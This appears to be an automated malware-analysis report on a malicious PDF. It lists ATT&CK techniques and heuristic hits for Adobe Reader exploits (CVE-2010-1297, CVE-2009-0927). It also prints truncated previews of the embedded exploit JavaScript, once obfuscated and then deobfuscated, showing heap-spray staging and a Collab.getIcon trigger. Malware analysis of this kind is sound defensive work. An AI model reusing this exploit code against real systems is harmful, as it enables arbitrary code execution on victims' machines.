Verdict: MALICIOUS
Risk Score: 424
Malware Insights
MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
- T1566.001 Spearphishing Attachment
This PDF file contains multiple critical heuristic firings indicating exploitation of known vulnerabilities, specifically CVE-2010-1297 (Adobe Flash) and CVE-2009-0927 (Collab.getIcon). The embedded JavaScript is heavily obfuscated but appears to be designed to download and execute a secondary payload. The ML classifier also strongly flagged this as malicious.
Machine Learning
- Nyx PDF Classifier malicious score 0.9997
Heuristics (11)
- Adobe Flash authplay SWF exploit in PDF — CVE-2010-1297 (critical; CVE likely; rule CVE_2010_1297_FLASH_RICHMEDIA): PDF combines RichMedia Flash activation, a crafted SWF with ActionScript prototype/AVM-era markers or the AES-PHP/authplay variant markers, and PDF-side shellcode heap-spray staging. This is the static delivery shape associated with CVE-2010-1297 in Adobe Reader's bundled authplay.dll.
- Collab.getIcon — CVE-2009-0927 (critical; CVE exact; rule CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- RichMedia (Flash) (high; rule PDF_RICHMEDIA): PDF contains /RichMedia (Adobe Flash) which is a historic exploit vector.
- Hex-obfuscated structural name object (high; rule PDF_OBFUSCATED_NAME_OBJECT): A structurally-dangerous PDF name (e.g. /OpenAction, /Launch, /AA, /EmbeddedFile, /SubmitForm) is written with #XX hex escapes to evade string-based scanners. Legitimate producers write these names literally; hex-encoding them is a deliberate obfuscation technique.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Embedded file (low; rule PDF_EMBEDDED): PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload.
- XFA form (low; rule PDF_XFA): PDF uses XML Forms Architecture — can contain script logic.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
  - http://ns.adobe.com/pdfx/1.3/ (in PDF document text)
  - http://ns.adobe.com/xdp/ (in PDF document text)
  - http://www.xfa.org/schema/xci/2.6/ (in PDF document text)
  - http://www.xfa.org/schema/xfa-template/2.6/ (in PDF document text)
Extracted artifacts (4)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| 8.swf (8298c90dcffb75747c86dc9458619c17368d5d989325569dee2a57a4af103da3) | pdf-embedded-file | PDF EmbeddedFile object 37 at offset 0x68089 | 2557 bytes |
| javascript_obj0027_000.js (1e3c145e99484ca7784a40ca9c59aa6e7400472f5d99675fcbdff3e182a6eeee) | pdf-javascript-stream | PDF /JS object 27 at offset 0x66B6D | 12262 bytes |

Detection
- ClamAV: Js.Exploit.Shellcode-18
- Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
var unes = unescape//jfpajg';[]'
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var sc1
for(i=0;i<18000;i++)
sc1=sc1+0x60
var sc2
for(i=0;i<18000;i++)
sc2=sc2+0x60
for(i=0;i<18000;i++)
var sc3
sc3=sc3+0x60
var sc4
for(i=0;i<18000;i++)
sc4=sc4+0x60
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
var strTempB="g\x65t\x49"//sgjlsg;slg;
strTempB+="\x63\x6f\x6e";
var strTempC="c\x6fll\x65\x63\x74"//gwwmjhg[lep'lgf;s
strTempC+="\x45\x6d\x61\x69lInfo";
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret =""
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret = ret+util[strTempA](Number("0x"+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function exp8() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
whi
... (truncated)

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js (e9c0ab22ec6616cd72aaf5cf98b1cee09a200a6374be7792fa36c690b84725d0) | deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 27 at offset 0x66B6D | 10856 bytes |

Detection
- ClamAV: Js.Exploit.Shellcode-18
- Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
var unes = unescape//jfpajg';[]'
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var sc1
for(i=0;i<18000;i++)
sc1=sc1+0x60
var sc2
for(i=0;i<18000;i++)
sc2=sc2+0x60
for(i=0;i<18000;i++)
var sc3
sc3=sc3+0x60
var sc4
for(i=0;i<18000;i++)
sc4=sc4+0x60
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
var strTempB="g\x65t\x49"//sgjlsg;slg;
strTempB+="\x63\x6f\x6e";
var strTempC="c\x6fll\x65\x63\x74"//gwwmjhg[lep'lgf;s
strTempC+="\x45\x6d\x61\x69lInfo";
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret =""
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret = ret+util[strTempA](Number("0x"+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function exp8() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\
... (truncated)

| Filename | Kind | Source | Size |
|---|---|---|---|
| js_property_alias_stage_000.js (b7b13616d51f57827ee1c85763327eb8b56641e61c3adcb69dd3d7f1b2eb87d9) | deobfuscated-js | JavaScript property alias normalized stage at offset 0x66B6D | 11328 bytes |

Detection
- ClamAV: Js.Exploit.Shellcode-18
- Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
var unes = unescape//jfpajg';[]'
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var sc1
for(i=0;i<18000;i++)
sc1=sc1+0x60
var sc2
for(i=0;i<18000;i++)
sc2=sc2+0x60
for(i=0;i<18000;i++)
var sc3
sc3=sc3+0x60
var sc4
for(i=0;i<18000;i++)
sc4=sc4+0x60
var strTempA="byteToChar";
var strTempB="getI"//sgjlsg;slg;
strTempB+="con";
var strTempC="collect"//gwwmjhg[lep'lgf;s
strTempC+="EmailInfo";
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret =""
for (var x=0;x < buf["length"]; x+=2) {
ret = ret+util[strTempA](Number("0x"+buf["substr"](x,2)));//
}
return ret;
}
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function exp8() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="getIcon";
wap = 0x24+blah["length"]
while (bbk["length"]<wap) bbk+=bbk;
fillbk = bbk["substring"](0, wap);
bk = bbk["substring"](0, bbk["length"]-wap);
while(bk["length"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096,
... (truncated)